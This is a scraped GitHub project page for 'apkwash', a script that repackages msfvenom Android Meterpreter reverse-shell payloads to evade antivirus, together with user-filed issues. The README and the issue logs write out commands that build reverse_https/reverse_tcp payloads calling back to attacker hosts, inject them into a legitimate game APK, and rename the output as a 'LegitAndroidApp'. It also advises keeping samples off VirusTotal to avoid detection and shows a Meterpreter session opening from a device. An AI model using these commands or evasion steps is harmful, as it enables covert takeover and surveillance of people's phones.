jbreed / apkwash Goto Github PK

Android APK Antivirus evasion for msfvenom generated payloads.

License: GNU General Public License v3.0

Shell 100.00%

apkwash's Introduction

apkwash

Android APK Antivirus evasion for msfvenom generated payloads.

Tested on Kali linux rolling.

Setup:
apt-get update && apt-get dist-upgrade
chmod +x apkwash
mv apkwash /usr/local/bin/.

On first run:
-Downloads and places apktool.jar in the user's /usr/local/bin directory
-Generates debug keystore for signing. Places it in ~/.android/

Usage Example:
apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk

Output:
<LegitAndroidApp>.apk & <LegitAndroidApp>.listener

Default values:
payload=android/meterpreter/reverse_https
LHOST=<eth0 IP address>
LPORT=443
output=AndroidService.apk

Options
-p | --payload <payload> This sets the payload to be generated by msfvenom.
-o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | --original <infile.apk> Input APK to inject the payload into (later update).
-g | --generate Generate a payload using defaults
-n | --newkey Generate a new debug key before signing
-v | --verbose Don't mask output of commands
-d | --debug Leaves the /tmp/payload files in place for review
-h | --help Help information

Antivirus detection:
2/35 on nodistribute - 2Aug17
Will be updating soon to cover these two flags.

FLAGGED BY AVAST!
APK:CloudRep[Susp] is the report for the suspicious app on Avast.
Per Avast: "the APK:CloudRep [Susp] is a warning-like message for applications that are very new/rare/previously unseen in our userbase." Based on this alone it doesn't appear we can modify anything to avoid being flagged. It allows the user to accept the risks, or uninstall the app.

Modifiations:
Feel free to open the script and make improvements. This script basically utilizes APKTool to open the package, uses sed to replace strings that flag AV, recompiles, then signs.

Files:
/tmp/payload (Main files to review: AndroidManifest.xml and the smali files)

Debugging
Run with '-d' and -'v' to display as much output along with not removing the /tmp/payload files.

If you are seeing other "Payload".smali files in /tmp/payload/smali/com/var1/var2/ then be sure you have an updated system (apt-get update && apt-get dist-upgrade. I have found an older msfvenom version output a different payload that will be flagged by AVG (1/35 on nodistribute). Just making sure you are completely updated should resolve this.

apkwash's People

Contributors

Stargazers

Watchers

apkwash's Issues

Name

In previous after installing payload the name of it was 'Androidservice' but now is 'MainActivity' how can I produce payload with name equal 'Androidservice'

Issues with timwr apk merge script

May I suggest adding support for xc0d3rz metasploit-apk-embed-payload, so that this script becomes one shop stop. Wash the APK and merge.

Brut fails

└─$ sudo apkwash -p android/meterpreter/reverse_https LHOST=192.168.1.125 LPORT=1023 -o output.apk -v -d
 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.125 LPORT=1023 -o output.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10515 bytes
Saved as: output.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
I: Using Apktool 2.2.4 on output.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
 [-]  Scrubbing the payload contents to avoid AV signatures...
 [-]  Finished scrubbing the content. Rebuilding the package with APKTool.
I: Using Apktool 2.2.4
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" W: /tmp/brut_util_Jar_3015128125048258067.tmp: 1: Syntax error: "(" unexpected
brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:496)
	at brut.androlib.Androlib.buildResources(Androlib.java:430)
	at brut.androlib.Androlib.build(Androlib.java:329)
	at brut.androlib.Androlib.build(Androlib.java:267)
	at brut.apktool.Main.cmdBuild(Main.java:230)
	at brut.apktool.Main.main(Main.java:83)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:441)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:482)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:435)
	... 6 more
 [-]  Washed package created: output.apk
mv: cannot stat '/tmp/payload/dist/output.apk': No such file or directory
 [-]  Checking for ~/.android/debug.keystore for signing
 [-]  Attempting to sign the package with your android debug key
/usr/local/bin/apkwash: line 50: jarsigner: command not found
 [-]  Signed the .apk file with ~/.android/debug.keystore
 [-]  To generate a new key per package use the '-n' option
 [-]  Cleaning up 
 [-]  Finished generating the payload.
 [-]  Please do not upload the washed/injected files to VirusTotal.com
 [-]  Use nodistribute.com, or manual scanning on a device.
 [-]  Generating an msf listener script
 [-]  Add an AutoRunScript? [y/N] n
 [-]  Listener script has been generated: /tmp/output.listener
 [-]  Start listener with: msfconsole -r /tmp/output.listener
 [-]  Launch listener now? [y/N] n
 [?]  Smali file structure: com.ribhheqzcx.jzxrqohrgz

This is the log. For some reason this brut tool fails. Could you fix or provide manual steps to perform the same tasks this "brut" tool is doing?

Error: No such file or directory @ rb_sysopen

Hi,
I get the below error when I run the command "sudo apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -o /home/kali/finaltraffic.apk -x /home/kali/com.skgames.trafficrider_2020-07-17.apk -verbose"

Error:

[] Rebuilding apk with meterpreter injection as /tmp/d20210731-6677-jfu2om/output.apk
[] Signing /tmp/d20210731-6677-jfu2om/output.apk
[*] Aligning /tmp/d20210731-6677-jfu2om/output.apk
Payload size: 116081404 bytes
Error: No such file or directory @ rb_sysopen - injected_/home/kali/com.skgames.trafficrider_2020-07-17.apk
[!] MSFVenom payload generation failed. Run with verbose for more information on the MSFVenom output.
[-] Generating an msf listener script
[-] Add an AutoRunScript? [y/N]

Can you please help?

APK DOSNT ASK PERMISSIONS

Hello all is generated but when I install infected APK on my phone it doesn'ask any permission so many modules of meterpreter don't work.

Have you solution??

Thanks in advance.

apkwash command not found

Problem solved

command not found

follow all steps but bash: apkwash: command not found
and root@ter:~/apkwash# ./apkwash
eth0: error fetching interface information: Device not found
./apkwash: line 40: apkwash: command not found

can help me
Kali GNU/Linux Rolling 64-bit

apkwash error after complete update and dist-upgrade on kali

root@Devilz-PC:/tmp# apkwash -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
 [-]  Scrubbing the payload contents to avoid AV signatures...
 [!]  An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! 

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue. Ex: # apt-get update && apt-get dist-upgrade

DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.2"
VERSION_ID="2017.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Only following 3 payloads do not work:
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell

Please Help!!!!

Embed payload not work

Unfortunately embed payload in original has problems especially singing!

mv: cannot stat '/tmp/payload/smali/com/metasploit'

i need help here. how to fix this
$ apkwash -p android/meterpreter/reverse_https lhost=192.168.1.102 lport=4444 -o /root/Desktop/asd.apk

[-] Generating MSFVenom payload
[-] msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.102 LPORT=443 -o /root/Desktop/asd.apk
[-] MSFVenom payload successfully generated.
[-] Opening the generated payload with APKTool.
[-] Scrubbing the payload contents to avoid AV signatures...
mv: cannot stat '/tmp/payload/smali/com/metasploit': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/stage': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/gxqskstfpk/Payload.smali': No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/res/values/strings.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
[-] Finished scrubbing the content. Rebuilding the package with APKTool.
[-] Washed package created: /root/Desktop/asd.apk
mv: cannot stat '/tmp/payload/dist/AndroidService.apk': No such file or directory
[-] Checking for ~/.android/debug.keystore for signing

somebody can tell me how to fix this ?? Thanks

meterpreter sessions closes immediately

msf exploit(handler) > run
[] Sending stage (67614 bytes) to 192.168.0.3
[] Meterpreter session 2 opened (192.168.0.7:4444 -> 192.168.0.3:34346) at 2017-07-28 00:32:32 -0400
[*] 192.168.0.3 - Meterpreter session 2 closed. Reason: Died
[-] Meterpreter session 2 is not valid and will be closed

please help ....

jbreed / apkwash Goto Github PK

apkwash's Introduction

apkwash

apkwash's People

Contributors

Stargazers

Watchers

Forkers

apkwash's Issues

Recommend Projects

Recommend Topics

Recommend Org